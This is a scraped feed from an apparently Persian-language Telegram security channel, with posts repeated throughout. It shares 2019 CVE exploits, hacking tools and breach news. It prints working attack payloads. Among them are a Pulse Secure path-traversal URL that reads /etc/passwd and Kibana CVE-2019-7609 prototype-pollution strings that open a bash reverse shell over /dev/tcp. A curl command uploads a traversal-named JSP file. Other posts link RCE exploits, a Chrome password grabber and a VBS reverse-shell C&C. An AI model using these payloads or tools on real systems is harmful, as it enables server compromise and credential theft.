امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
بیش از 14500 سرور Pulse secure در برابر اکسپلویت CVE-2019-11510 آسیب پذیر هستند.
ده کشور اول در این خصوص در تصویر قابل مشاهده است.
نکته جالب، آسیب پذیر بودن سازمان های نظامی و دولتی و شرکت های بزرگ می باشد.
https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/
#pulse
#news
#usa
@sec_nerd
ده کشور اول در این خصوص در تصویر قابل مشاهده است.
نکته جالب، آسیب پذیر بودن سازمان های نظامی و دولتی و شرکت های بزرگ می باشد.
https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/
#pulse
#news
#usa
@sec_nerd
تشریح و اکسپلویت آسیب پذیری Race Condition در وب اپلیکیشن
https://memoryleaks.ir/race-condition-in-web-application/
#web
#RaceCondition
#RC
@sec_nerd
https://memoryleaks.ir/race-condition-in-web-application/
#web
#RaceCondition
#RC
@sec_nerd
مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
آسیبپذیری Race Condition
در این پست میخوایم آسیب پذیری Race Conditon رو تشریح کنیم،اول بگیم که این آسیب پذیری چیه و یه مثال در دنیای واقعی ازش بگیم،بعد بریم یک اسکریپت PHP از گیتهاب که آسیب پذیری Race Condition داره رو کلون و اکسپلویت کنیم.
اکسپلویت اجرای دستور از راه دور بر روی جوملا نسخه ی 3.4.6
https://www.exploit-db.com/exploits/47524
https://github.com/kiks7/rusty_joomla_rce
#joomla
#web
#rce
#pentest
@sec_nerd
https://www.exploit-db.com/exploits/47524
https://github.com/kiks7/rusty_joomla_rce
#joomla
#web
#rce
#pentest
@sec_nerd
Exploit Database
Joomla! 3.4.6 - Remote Code Execution
Joomla! 3.4.6 - Remote Code Execution.. webapps exploit for PHP platform
استخراج پسوردهای ذخیره شده در کروم بصورت clear text
https://github.com/x899/chrome_password_grabber
#chrome
#enum
@sec_nerd
https://github.com/x899/chrome_password_grabber
#chrome
#enum
@sec_nerd
GitHub
GitHub - priyankchheda/chrome_password_grabber: Get unencrypted 'Saved Password' from Google Chrome
Get unencrypted 'Saved Password' from Google Chrome - priyankchheda/chrome_password_grabber
POC: kibana < 6.6.0
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__
https://slides.com/securitymb/prototype-pollution-in-kibana/#/58
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__
https://slides.com/securitymb/prototype-pollution-in-kibana/#/58
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
Slides
Prototype Pollution in Kibana
Presentation I did for OWASP Poland Day, 14th October 2019
امنیت اطلاعات
POC: kibana < 6.6.0 .es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__ https://slides.com/securitymb/prototype…
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2019-7609
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')__
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')__
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
امنیت اطلاعات
دیتابیس سایت امریکایی equifax برای فروش در دارکنت قرار داده شده! قیمت : 600 بیت کوین! #news #breach #equifax
طبق شکایتی که از سوی سهامداران شرکت equifax تنظیم شده است مشخص شد این شرکت از نام کاربری و پسورد admin:admin برای دسترسی به پنل مدیریت پورتال حساسی استفاده میکرده است که این ضعف به هکرها کمک کرده است ضمن نفوذ به سرور و سرقت داده های کاربران، کلیدهای رمزگشایی پسوردهای رمزنگاری شده را نیز بدست آورند.
https://finance.yahoo.com/news/equifax-password-username-admin-lawsuit-201118316.html
#news
#equifax
#usa
#breach
@sec_nerd
https://finance.yahoo.com/news/equifax-password-username-admin-lawsuit-201118316.html
#news
#equifax
#usa
#breach
@sec_nerd
Yahoo Finance
Equifax used 'admin' as username and password for sensitive data: lawsuit
A class action lawsuit filed in January 2019 claims Equifax used "admin" as both password and username for a portal with sensitive information.
یک C&C عالی با فرمت VBS که در تمامی ویندوز ها پشتیبانی میشود.
https://github.com/bitsadmin/revbshell
#C&C
#ReverseShell
#VBS
@sec_nerd
https://github.com/bitsadmin/revbshell
#C&C
#ReverseShell
#VBS
@sec_nerd
GitHub
GitHub - bitsadmin/revbshell: ReVBShell - Reverse VBS Shell
ReVBShell - Reverse VBS Shell. Contribute to bitsadmin/revbshell development by creating an account on GitHub.
ابزار بروت فورس دایرکتوری های سرور یا سایت
https://github.com/stefanoj3/dirstalk
#fuzz
#web
#pentest
#bugbounty
@sec_nerd
https://github.com/stefanoj3/dirstalk
#fuzz
#web
#pentest
#bugbounty
@sec_nerd
GitHub
GitHub - stefanoj3/dirstalk: Modern alternative to dirbuster/dirb
Modern alternative to dirbuster/dirb. Contribute to stefanoj3/dirstalk development by creating an account on GitHub.
آسیب پذیری که در nhttpd کشف و اکسپلویت شده بود و هکر میتونست از طریق Directory Traversal به آسیب پذیری RCE برسه.
https://www.easyhack.in/2019/10/20/nostromo-httpd-remote-code-execution-cve-2019-16278/
#nhttpd
#rce
#webserver
@sec_nerd
https://www.easyhack.in/2019/10/20/nostromo-httpd-remote-code-execution-cve-2019-16278/
#nhttpd
#rce
#webserver
@sec_nerd
Easy Hack
Nostromo httpd Remote Code Execution | CVE-2019-16278 ~ Easy Hack
Nostromo is an open-source webserver written in C refer to nhttpd. Recently, in nostromo webserver security researcher sp0re has found 0day vulnerability. In 0day vulnerability is an attacker can execute remote code. Back in 2011 CVE-2011-0751, this vulnerability…
امنیت اطلاعات
CVE-2019-7609 .es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')__ #kibana #elasticsearch #nosql #rce @sec_nerd
اسکریپت پایتون برای انجام این حمله
https://github.com/LandGrey/CVE-2019-7609/
#kibana
#elasticsearch
@sec_nerd
https://github.com/LandGrey/CVE-2019-7609/
#kibana
#elasticsearch
@sec_nerd
GitHub
GitHub - LandGrey/CVE-2019-7609: exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts
exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts - LandGrey/CVE-2019-7609
برگه تقلبی در خصوص کشف آسیب پذیری هایی که در PHP به وجود می آیند.
https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet/blob/master/README.md
#web
#PHP
#WhiteBox
#CheatSheet
@sec_nerd
https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet/blob/master/README.md
#web
#PHP
#WhiteBox
#CheatSheet
@sec_nerd
GitHub
dustyfresh/PHP-vulnerability-audit-cheatsheet
This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function. - dustyfresh/P...
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است
https://bugs.php.net/bug.php?id=78599
و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند
اکسپلویت:
https://github.com/neex/phuip-fpizdam
#php
#nginx
#rce
@sec_nerd
https://bugs.php.net/bug.php?id=78599
و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند
اکسپلویت:
https://github.com/neex/phuip-fpizdam
#php
#nginx
#rce
@sec_nerd
GitHub
GitHub - neex/phuip-fpizdam: Exploit for CVE-2019-11043
Exploit for CVE-2019-11043. Contribute to neex/phuip-fpizdam development by creating an account on GitHub.
نحوه اکسپلویت کردن آسیب پذیری Directory Traversal با استفاده از curl
curl -F "file=@PentesterLab
.jsp;filename=../../../../../../../../hacker.jsp"
#terminal
#web
#tricks
@sec_nerd
curl -F "file=@PentesterLab
.jsp;filename=../../../../../../../../hacker.jsp"
#terminal
#web
#tricks
@sec_nerd
جمع آوری زیردامنه های وبسایت با استفاده از ابزاری که از api وبسایت whoxy.com بهره میبرد
https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py
برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.
#web
#bugbounty
#subdomain
@sec_nerd
https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py
برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.
#web
#bugbounty
#subdomain
@sec_nerd
۱۷۹ گیگابایت از اطلاعات کارکنان ارتش امریکا بر روی یک سرور ابری آمازون بصورت محافظت نشده قرار داشت.
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.
https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/
#news
#breach
#usa
@sec_nerd
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.
https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/
#news
#breach
#usa
@sec_nerd
Security Boulevard
Sensitive US government and military travel details left exposed online
Significant amounts of sensitive data about employees of the US government military personnel data could now be in the public domain following its exposure in a data leak. Israeli security researchers Noam Rotem and Ran Locar discovered 179 GB of data on…
آسیب پذیری Cross Context Scripting(XCS) و نحوه اکسپلویت
https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation
#web
#XSS
#XCS
@sec_nerd
https://www.slideshare.net/mobile/robertosl81/cross-context-scripting-attacks-exploitation
#web
#XSS
#XCS
@sec_nerd
www.slideshare.net
Cross Context Scripting attacks & exploitation
Cross Context Scripting (XCS) is a type of XSS (Cross Site Scripting) injection which occurs from an untrusted zone, typically a web page on the Internet into …